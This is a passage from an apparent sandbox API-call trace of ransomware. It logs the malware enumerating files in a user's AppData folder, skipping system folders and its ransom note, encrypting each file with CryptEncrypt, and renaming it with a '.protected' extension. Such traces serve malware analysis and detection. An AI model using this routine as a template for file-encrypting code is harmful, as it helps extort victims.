nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.055] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.055] CloseHandle (hObject=0xd4) returned 1 [0091.056] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\M_rWoVKTtbG.avi.protected") returned 75 [0091.056] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\M_rWoVKTtbG.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\m_rwovkttbg.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\M_rWoVKTtbG.avi.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\m_rwovkttbg.avi.protected")) returned 1 [0091.056] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.056] lstrcmpiW (lpString1="ndi3ygm.mkv", lpString2="Windows") returned -1 [0091.056] lstrcmpiW (lpString1="ndi3ygm.mkv", lpString2="Program Files") returned -1 [0091.056] lstrcmpiW (lpString1="ndi3ygm.mkv", lpString2="Program Files (x86)") returned -1 [0091.056] lstrcmpiW (lpString1="ndi3ygm.mkv", lpString2="$Recycle.bin") returned 1 [0091.056] lstrcmpiW (lpString1="ndi3ygm.mkv", lpString2="System Volume Information") returned -1 [0091.056] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ndi3ygm.mkv") returned 61 [0091.056] StrStrIW (lpFirst="ndi3ygm.mkv", lpSrch=".protected") returned 0x0 [0091.056] lstrcmpW (lpString1="ndi3ygm.mkv", lpString2="RESTORE_FILES.txt") returned -1 [0091.057] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.057] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.057] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ndi3ygm.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ndi3ygm.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.057] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ndi3ygm.mkv") returned 61 [0091.057] StrStrW (lpFirst="ndi3ygm.mkv", lpSrch=".txt") returned 0x0 [0091.057] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ndi3ygm.mkv") returned 61 [0091.057] StrStrW (lpFirst="ndi3ygm.mkv", lpSrch=".rar") returned 0x0 [0091.057] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ndi3ygm.mkv") returned 61 [0091.057] StrStrW (lpFirst="ndi3ygm.mkv", lpSrch=".zip") returned 0x0 [0091.057] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.058] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.058] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.058] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.058] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.058] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.058] CloseHandle (hObject=0xd4) returned 1 [0091.059] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ndi3ygm.mkv.protected") returned 71 [0091.059] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ndi3ygm.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ndi3ygm.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ndi3ygm.mkv.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ndi3ygm.mkv.protected")) returned 1 [0091.060] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.060] lstrcmpiW (lpString1="NOHa77v.gif", lpString2="Windows") returned -1 [0091.060] lstrcmpiW (lpString1="NOHa77v.gif", lpString2="Program Files") returned -1 [0091.060] lstrcmpiW (lpString1="NOHa77v.gif", lpString2="Program Files (x86)") returned -1 [0091.060] lstrcmpiW (lpString1="NOHa77v.gif", lpString2="$Recycle.bin") returned 1 [0091.060] lstrcmpiW (lpString1="NOHa77v.gif", lpString2="System Volume Information") returned -1 [0091.060] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\NOHa77v.gif") returned 61 [0091.060] StrStrIW (lpFirst="NOHa77v.gif", lpSrch=".protected") returned 0x0 [0091.060] lstrcmpW (lpString1="NOHa77v.gif", lpString2="RESTORE_FILES.txt") returned -1 [0091.060] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.060] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.060] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\NOHa77v.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\noha77v.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.060] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\NOHa77v.gif") returned 61 [0091.060] StrStrW (lpFirst="NOHa77v.gif", lpSrch=".txt") returned 0x0 [0091.060] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\NOHa77v.gif") returned 61 [0091.060] StrStrW (lpFirst="NOHa77v.gif", lpSrch=".rar") returned 0x0 [0091.060] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\NOHa77v.gif") returned 61 [0091.060] StrStrW (lpFirst="NOHa77v.gif", lpSrch=".zip") returned 0x0 [0091.060] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.061] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.061] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.062] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.062] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.062] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.062] CloseHandle (hObject=0xd4) returned 1 [0091.062] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\NOHa77v.gif.protected") returned 71 [0091.062] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\NOHa77v.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\noha77v.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\NOHa77v.gif.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\noha77v.gif.protected")) returned 1 [0091.063] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.063] lstrcmpiW (lpString1="oJ7Xs.ods", lpString2="Windows") returned -1 [0091.063] lstrcmpiW (lpString1="oJ7Xs.ods", lpString2="Program Files") returned -1 [0091.063] lstrcmpiW (lpString1="oJ7Xs.ods", lpString2="Program Files (x86)") returned -1 [0091.063] lstrcmpiW (lpString1="oJ7Xs.ods", lpString2="$Recycle.bin") returned 1 [0091.063] lstrcmpiW (lpString1="oJ7Xs.ods", lpString2="System Volume Information") returned -1 [0091.063] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\oJ7Xs.ods") returned 59 [0091.063] StrStrIW (lpFirst="oJ7Xs.ods", lpSrch=".protected") returned 0x0 [0091.063] lstrcmpW (lpString1="oJ7Xs.ods", lpString2="RESTORE_FILES.txt") returned -1 [0091.063] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.063] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.063] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\oJ7Xs.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\oj7xs.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.064] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\oJ7Xs.ods") returned 59 [0091.064] StrStrW (lpFirst="oJ7Xs.ods", lpSrch=".txt") returned 0x0 [0091.064] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\oJ7Xs.ods") returned 59 [0091.064] StrStrW (lpFirst="oJ7Xs.ods", lpSrch=".rar") returned 0x0 [0091.064] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\oJ7Xs.ods") returned 59 [0091.064] StrStrW (lpFirst="oJ7Xs.ods", lpSrch=".zip") returned 0x0 [0091.064] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.064] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.064] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.065] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.065] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.065] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.065] CloseHandle (hObject=0xd4) returned 1 [0091.066] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\oJ7Xs.ods.protected") returned 69 [0091.066] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\oJ7Xs.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\oj7xs.ods"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\oJ7Xs.ods.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\oj7xs.ods.protected")) returned 1 [0091.067] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.067] lstrcmpiW (lpString1="taoP-XRrVNbmdlJ.png", lpString2="Windows") returned -1 [0091.067] lstrcmpiW (lpString1="taoP-XRrVNbmdlJ.png", lpString2="Program Files") returned 1 [0091.067] lstrcmpiW (lpString1="taoP-XRrVNbmdlJ.png", lpString2="Program Files (x86)") returned 1 [0091.067] lstrcmpiW (lpString1="taoP-XRrVNbmdlJ.png", lpString2="$Recycle.bin") returned 1 [0091.067] lstrcmpiW (lpString1="taoP-XRrVNbmdlJ.png", lpString2="System Volume Information") returned 1 [0091.067] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\taoP-XRrVNbmdlJ.png") returned 69 [0091.067] StrStrIW (lpFirst="taoP-XRrVNbmdlJ.png", lpSrch=".protected") returned 0x0 [0091.067] lstrcmpW (lpString1="taoP-XRrVNbmdlJ.png", lpString2="RESTORE_FILES.txt") returned 1 [0091.067] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.067] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.067] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\taoP-XRrVNbmdlJ.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\taop-xrrvnbmdlj.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.067] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\taoP-XRrVNbmdlJ.png") returned 69 [0091.067] StrStrW (lpFirst="taoP-XRrVNbmdlJ.png", lpSrch=".txt") returned 0x0 [0091.067] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\taoP-XRrVNbmdlJ.png") returned 69 [0091.067] StrStrW (lpFirst="taoP-XRrVNbmdlJ.png", lpSrch=".rar") returned 0x0 [0091.067] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\taoP-XRrVNbmdlJ.png") returned 69 [0091.067] StrStrW (lpFirst="taoP-XRrVNbmdlJ.png", lpSrch=".zip") returned 0x0 [0091.067] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.068] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.068] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.068] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.069] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.069] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.069] CloseHandle (hObject=0xd4) returned 1 [0091.069] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\taoP-XRrVNbmdlJ.png.protected") returned 79 [0091.069] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\taoP-XRrVNbmdlJ.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\taop-xrrvnbmdlj.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\taoP-XRrVNbmdlJ.png.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\taop-xrrvnbmdlj.png.protected")) returned 1 [0091.070] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.070] lstrcmpiW (lpString1="THCHiExi VBzQMf6D9tY.jpg", lpString2="Windows") returned -1 [0091.070] lstrcmpiW (lpString1="THCHiExi VBzQMf6D9tY.jpg", lpString2="Program Files") returned 1 [0091.070] lstrcmpiW (lpString1="THCHiExi VBzQMf6D9tY.jpg", lpString2="Program Files (x86)") returned 1 [0091.070] lstrcmpiW (lpString1="THCHiExi VBzQMf6D9tY.jpg", lpString2="$Recycle.bin") returned 1 [0091.070] lstrcmpiW (lpString1="THCHiExi VBzQMf6D9tY.jpg", lpString2="System Volume Information") returned 1 [0091.070] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\THCHiExi VBzQMf6D9tY.jpg") returned 74 [0091.070] StrStrIW (lpFirst="THCHiExi VBzQMf6D9tY.jpg", lpSrch=".protected") returned 0x0 [0091.070] lstrcmpW (lpString1="THCHiExi VBzQMf6D9tY.jpg", lpString2="RESTORE_FILES.txt") returned 1 [0091.070] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.070] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.070] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\THCHiExi VBzQMf6D9tY.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\thchiexi vbzqmf6d9ty.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.070] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\THCHiExi VBzQMf6D9tY.jpg") returned 74 [0091.070] StrStrW (lpFirst="THCHiExi VBzQMf6D9tY.jpg", lpSrch=".txt") returned 0x0 [0091.070] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\THCHiExi VBzQMf6D9tY.jpg") returned 74 [0091.070] StrStrW (lpFirst="THCHiExi VBzQMf6D9tY.jpg", lpSrch=".rar") returned 0x0 [0091.070] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\THCHiExi VBzQMf6D9tY.jpg") returned 74 [0091.071] StrStrW (lpFirst="THCHiExi VBzQMf6D9tY.jpg", lpSrch=".zip") returned 0x0 [0091.071] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.071] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.071] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.072] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.072] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.072] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.072] CloseHandle (hObject=0xd4) returned 1 [0091.073] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\THCHiExi VBzQMf6D9tY.jpg.protected") returned 84 [0091.073] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\THCHiExi VBzQMf6D9tY.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\thchiexi vbzqmf6d9ty.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\THCHiExi VBzQMf6D9tY.jpg.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\thchiexi vbzqmf6d9ty.jpg.protected")) returned 1 [0091.073] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.073] lstrcmpiW (lpString1="unHbl.rtf", lpString2="Windows") returned -1 [0091.073] lstrcmpiW (lpString1="unHbl.rtf", lpString2="Program Files") returned 1 [0091.073] lstrcmpiW (lpString1="unHbl.rtf", lpString2="Program Files (x86)") returned 1 [0091.073] lstrcmpiW (lpString1="unHbl.rtf", lpString2="$Recycle.bin") returned 1 [0091.073] lstrcmpiW (lpString1="unHbl.rtf", lpString2="System Volume Information") returned 1 [0091.073] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\unHbl.rtf") returned 59 [0091.073] StrStrIW (lpFirst="unHbl.rtf", lpSrch=".protected") returned 0x0 [0091.073] lstrcmpW (lpString1="unHbl.rtf", lpString2="RESTORE_FILES.txt") returned 1 [0091.073] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.073] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.074] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\unHbl.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\unhbl.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.074] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\unHbl.rtf") returned 59 [0091.074] StrStrW (lpFirst="unHbl.rtf", lpSrch=".txt") returned 0x0 [0091.074] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\unHbl.rtf") returned 59 [0091.074] StrStrW (lpFirst="unHbl.rtf", lpSrch=".rar") returned 0x0 [0091.074] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\unHbl.rtf") returned 59 [0091.074] StrStrW (lpFirst="unHbl.rtf", lpSrch=".zip") returned 0x0 [0091.074] ReadFile (in: hFile=0xd4, 